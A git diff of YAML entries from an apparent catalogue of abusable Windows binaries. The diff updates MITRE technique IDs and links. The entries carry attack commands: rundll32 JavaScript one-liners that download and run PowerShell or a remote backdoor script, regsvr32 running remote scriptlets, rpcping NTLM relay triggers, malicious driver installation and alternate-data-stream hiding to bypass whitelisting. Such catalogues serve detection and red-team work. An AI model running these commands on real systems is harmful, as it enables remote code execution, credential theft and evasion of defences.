OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\pcalua.exe
|
- Path: C:\Windows\System32\pcalua.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\pcwrun.exe
|
- Path: C:\Windows\System32\pcwrun.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Reconnaissance
|
Category: Reconnaissance
|
||||||
Privileges: Administrator
|
Privileges: Administrator
|
||||||
MitreID: T1040
|
MitreID: T1040
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1040
|
|
||||||
OperatingSystem: Windows 10 1809 and later
|
OperatingSystem: Windows 10 1809 and later
|
||||||
- Command: pktmon.exe filter add -p 445
|
- Command: pktmon.exe filter add -p 445
|
||||||
Description: Select Desired ports for packet capture
|
Description: Select Desired ports for packet capture
|
||||||
@ -18,7 +17,6 @@ Commands:
|
|||||||
Category: Reconnaissance
|
Category: Reconnaissance
|
||||||
Privileges: Administrator
|
Privileges: Administrator
|
||||||
MitreID: T1040
|
MitreID: T1040
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1040
|
|
||||||
OperatingSystem: Windows 10 1809 and later
|
OperatingSystem: Windows 10 1809 and later
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\pktmon.exe
|
- Path: c:\windows\system32\pktmon.exe
|
||||||
|
@ -1,23 +1,22 @@
|
|||||||
---
|
---
|
||||||
Name: Pnputil.exe
|
Name: Pnputil.exe
|
||||||
Description: used for Install drivers.
|
Description: Used for installing drivers
|
||||||
Author: Hai vaknin (lux)
|
Author: Hai vaknin (lux)
|
||||||
Created: 25/12/2020
|
Created: 2020-12-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: pnputil.exe -i -a C:\Users\hai\Desktop\mo.inf
|
- Command: pnputil.exe -i -a C:\Users\hai\Desktop\mo.inf
|
||||||
Description: used for Install drivers
|
Description: Used for installing drivers
|
||||||
Usecase: add malicious driver.
|
Usecase: Aadd malicious driver
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: Administrator
|
Privileges: Administrator
|
||||||
MitreID: T1215
|
MitreID: T1547.006
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1215
|
|
||||||
OperatingSystem: Windows 10,7
|
OperatingSystem: Windows 10,7
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\system32\pnputil.exe
|
- Path: C:\Windows\system32\pnputil.exe
|
||||||
Code_Sample: https://github.com/LuxNoBulIshit/test.inf/blob/main/inf
|
Code_Sample: https://github.com/LuxNoBulIshit/test.inf/blob/main/inf
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Hai Vaknin(Lux)
|
- Person: Hai Vaknin(Lux)
|
||||||
Handle: 'LuxNoBulIshit'
|
Handle: '@LuxNoBulIshit'
|
||||||
- Person: Avihay eldad
|
- Person: Avihay eldad
|
||||||
Handle: 'aloneliassaf'
|
Handle: '@aloneliassaf'
|
||||||
---
|
---
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\Presentationhost.exe
|
- Path: C:\Windows\System32\Presentationhost.exe
|
||||||
|
@ -9,8 +9,7 @@ Commands:
|
|||||||
Usecase: Hide binary file in alternate data stream to potentially bypass defensive counter measures
|
Usecase: Hide binary file in alternate data stream to potentially bypass defensive counter measures
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1096
|
MitreID: T1564.004
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe
|
- Command: print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe
|
||||||
Description: Copy FileToCopy.exe to the target C:\ADS\CopyOfFile.exe
|
Description: Copy FileToCopy.exe to the target C:\ADS\CopyOfFile.exe
|
||||||
@ -18,7 +17,6 @@ Commands:
|
|||||||
Category: Copy
|
Category: Copy
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe
|
- Command: print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe
|
||||||
Description: Copy File.exe from a network share to the target c:\OutFolder\outfile.exe.
|
Description: Copy File.exe from a network share to the target c:\OutFolder\outfile.exe.
|
||||||
@ -26,7 +24,6 @@ Commands:
|
|||||||
Category: Copy
|
Category: Copy
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\print.exe
|
- Path: C:\Windows\System32\print.exe
|
||||||
|
@ -10,15 +10,13 @@ Commands:
|
|||||||
Category: Download
|
Category: Download
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1105/
|
|
||||||
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: PrintBrm -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder
|
- Command: PrintBrm -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder
|
||||||
Description: Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder
|
Description: Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder
|
||||||
Usecase: Decompress and extract a ZIP file stored on an alternate data stream to a new folder
|
Usecase: Decompress and extract a ZIP file stored on an alternate data stream to a new folder
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1096
|
MitreID: T1564.004
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1096/
|
|
||||||
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\spool\tools\PrintBrm.exe
|
- Path: C:\Windows\System32\spool\tools\PrintBrm.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Reconnaissance
|
Category: Reconnaissance
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1113
|
MitreID: T1113
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1113/
|
|
||||||
OperatingSystem: since Windows 7 (client) / Windows 2008 R2
|
OperatingSystem: since Windows 7 (client) / Windows 2008 R2
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\psr.exe
|
- Path: c:\windows\system32\psr.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User, Administrator in Windows 8
|
Privileges: User, Administrator in Windows 8
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\rasautou.exe
|
- Path: C:\Windows\System32\rasautou.exe
|
||||||
|
@ -9,8 +9,7 @@ Commands:
|
|||||||
Usecase: Hide/plant registry information in Alternate data stream for later use
|
Usecase: Hide/plant registry information in Alternate data stream for later use
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1096
|
MitreID: T1564.004
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\reg.exe
|
- Path: C:\Windows\System32\reg.exe
|
||||||
|
@ -9,16 +9,14 @@ Commands:
|
|||||||
Usecase: Execute code and bypass Application whitelisting
|
Usecase: Execute code and bypass Application whitelisting
|
||||||
Category: AWL bypass
|
Category: AWL bypass
|
||||||
Privileges: Local Admin
|
Privileges: Local Admin
|
||||||
MitreID: T1121
|
MitreID: T1218.009
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1121
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: regasm.exe /U AllTheThingsx64.dll
|
- Command: regasm.exe /U AllTheThingsx64.dll
|
||||||
Description: Loads the target .DLL file and executes the UnRegisterClass function.
|
Description: Loads the target .DLL file and executes the UnRegisterClass function.
|
||||||
Usecase: Execute code and bypass Application whitelisting
|
Usecase: Execute code and bypass Application whitelisting
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1121
|
MitreID: T1218.009
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1121
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
|
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
|
||||||
@ -32,7 +30,7 @@ Detection:
|
|||||||
Resources:
|
Resources:
|
||||||
- Link: https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
|
- Link: https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
|
||||||
- Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
- Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||||
- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1121/T1121.md
|
- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Casey Smith
|
- Person: Casey Smith
|
||||||
Handle: '@subtee'
|
Handle: '@subtee'
|
||||||
|
@ -9,16 +9,14 @@ Commands:
|
|||||||
Usecase: Hide registry data in alternate data stream
|
Usecase: Hide registry data in alternate data stream
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1096
|
MitreID: T1564.004
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: regedit C:\ads\file.txt:regfile.reg
|
- Command: regedit C:\ads\file.txt:regfile.reg
|
||||||
Description: Import the target .REG file into the Registry.
|
Description: Import the target .REG file into the Registry.
|
||||||
Usecase: Import hidden registry data from alternate data stream
|
Usecase: Import hidden registry data from alternate data stream
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1096
|
MitreID: T1564.004
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\regedit.exe
|
- Path: C:\Windows\System32\regedit.exe
|
||||||
|
@ -9,8 +9,7 @@ Commands:
|
|||||||
Usecase: Write to registry
|
Usecase: Write to registry
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1096
|
MitreID: T1564.004
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\regini.exe
|
- Path: C:\Windows\System32\regini.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\Register-cimprovider.exe
|
- Path: C:\Windows\System32\Register-cimprovider.exe
|
||||||
|
@ -9,16 +9,14 @@ Commands:
|
|||||||
Usecase: Execute dll file and bypass Application whitelisting
|
Usecase: Execute dll file and bypass Application whitelisting
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: Local Admin
|
Privileges: Local Admin
|
||||||
MitreID: T1121
|
MitreID: T1218.009
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1121
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: regsvcs.exe AllTheThingsx64.dll
|
- Command: regsvcs.exe AllTheThingsx64.dll
|
||||||
Description: Loads the target .DLL file and executes the RegisterClass function.
|
Description: Loads the target .DLL file and executes the RegisterClass function.
|
||||||
Usecase: Execute dll file and bypass Application whitelisting
|
Usecase: Execute dll file and bypass Application whitelisting
|
||||||
Category: AWL bypass
|
Category: AWL bypass
|
||||||
Privileges: Local Admin
|
Privileges: Local Admin
|
||||||
MitreID: T1121
|
MitreID: T1218.009
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1121
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\regsvcs.exe
|
- Path: C:\Windows\System32\regsvcs.exe
|
||||||
@ -30,7 +28,7 @@ Detection:
|
|||||||
Resources:
|
Resources:
|
||||||
- Link: https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
|
- Link: https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
|
||||||
- Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
- Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||||
- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1121/T1121.md
|
- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Casey Smith
|
- Person: Casey Smith
|
||||||
Handle: '@subtee'
|
Handle: '@subtee'
|
||||||
|
@ -9,32 +9,28 @@ Commands:
|
|||||||
Usecase: Execute code from remote scriptlet, bypass Application whitelisting
|
Usecase: Execute code from remote scriptlet, bypass Application whitelisting
|
||||||
Category: AWL bypass
|
Category: AWL bypass
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1117
|
MitreID: T1218.010
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1117
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
|
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
|
||||||
Description: Execute the specified local .SCT script with scrobj.dll.
|
Description: Execute the specified local .SCT script with scrobj.dll.
|
||||||
Usecase: Execute code from scriptlet, bypass Application whitelisting
|
Usecase: Execute code from scriptlet, bypass Application whitelisting
|
||||||
Category: AWL bypass
|
Category: AWL bypass
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1117
|
MitreID: T1218.010
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1117
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
|
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
|
||||||
Description: Execute the specified remote .SCT script with scrobj.dll.
|
Description: Execute the specified remote .SCT script with scrobj.dll.
|
||||||
Usecase: Execute code from remote scriptlet, bypass Application whitelisting
|
Usecase: Execute code from remote scriptlet, bypass Application whitelisting
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1117
|
MitreID: T1218.010
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1117
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
|
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
|
||||||
Description: Execute the specified local .SCT script with scrobj.dll.
|
Description: Execute the specified local .SCT script with scrobj.dll.
|
||||||
Usecase: Execute code from scriptlet, bypass Application whitelisting
|
Usecase: Execute code from scriptlet, bypass Application whitelisting
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1117
|
MitreID: T1218.010
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1117
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\regsvr32.exe
|
- Path: C:\Windows\System32\regsvr32.exe
|
||||||
@ -47,7 +43,7 @@ Detection:
|
|||||||
Resources:
|
Resources:
|
||||||
- Link: https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/
|
- Link: https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/
|
||||||
- Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
- Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||||
- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1117/T1117.md
|
- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Casey Smith
|
- Person: Casey Smith
|
||||||
Handle: '@subtee'
|
Handle: '@subtee'
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Copy
|
Category: Copy
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
|
- Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
|
||||||
Description: Download/Copy bar.exe to outdir
|
Description: Download/Copy bar.exe to outdir
|
||||||
@ -18,7 +17,6 @@ Commands:
|
|||||||
Category: Download
|
Category: Download
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\replace.exe
|
- Path: C:\Windows\System32\replace.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Credentials
|
Category: Credentials
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1003
|
MitreID: T1003
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1003
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: rpcping /s 10.0.0.35 /e 9997 /a connect /u NTLM
|
- Command: rpcping /s 10.0.0.35 /e 9997 /a connect /u NTLM
|
||||||
Description: Trigger an authenticated RPC call to the target server (/s) that could be relayed to a privileged resource (Sign not Set).
|
Description: Trigger an authenticated RPC call to the target server (/s) that could be relayed to a privileged resource (Sign not Set).
|
||||||
@ -18,7 +17,6 @@ Commands:
|
|||||||
Category: Credentials
|
Category: Credentials
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1187
|
MitreID: T1187
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1187/
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\rpcping.exe
|
- Path: C:\Windows\System32\rpcping.exe
|
||||||
|
@ -9,64 +9,56 @@ Commands:
|
|||||||
Usecase: Execute dll file
|
Usecase: Execute dll file
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1085
|
MitreID: T1218.011
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint
|
- Command: rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint
|
||||||
Description: Use Rundll32.exe to execute a DLL from a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute.
|
Description: Use Rundll32.exe to execute a DLL from a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute.
|
||||||
Usecase: Execute DLL from SMB share.
|
Usecase: Execute DLL from SMB share.
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1085
|
MitreID: T1218.011
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1085
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
|
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
|
||||||
Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
|
Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
|
||||||
Usecase: Execute code from Internet
|
Usecase: Execute code from Internet
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1085
|
MitreID: T1218.011
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
|
- Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
|
||||||
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe.
|
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe.
|
||||||
Usecase: Proxy execution
|
Usecase: Proxy execution
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1085
|
MitreID: T1218.011
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
|
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
|
||||||
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.
|
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.
|
||||||
Usecase: Proxy execution
|
Usecase: Proxy execution
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1085
|
MitreID: T1218.011
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
|
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
|
||||||
Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.
|
Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.
|
||||||
Usecase: Execute code from Internet
|
Usecase: Execute code from Internet
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1085
|
MitreID: T1218.011
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
|
- Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
|
||||||
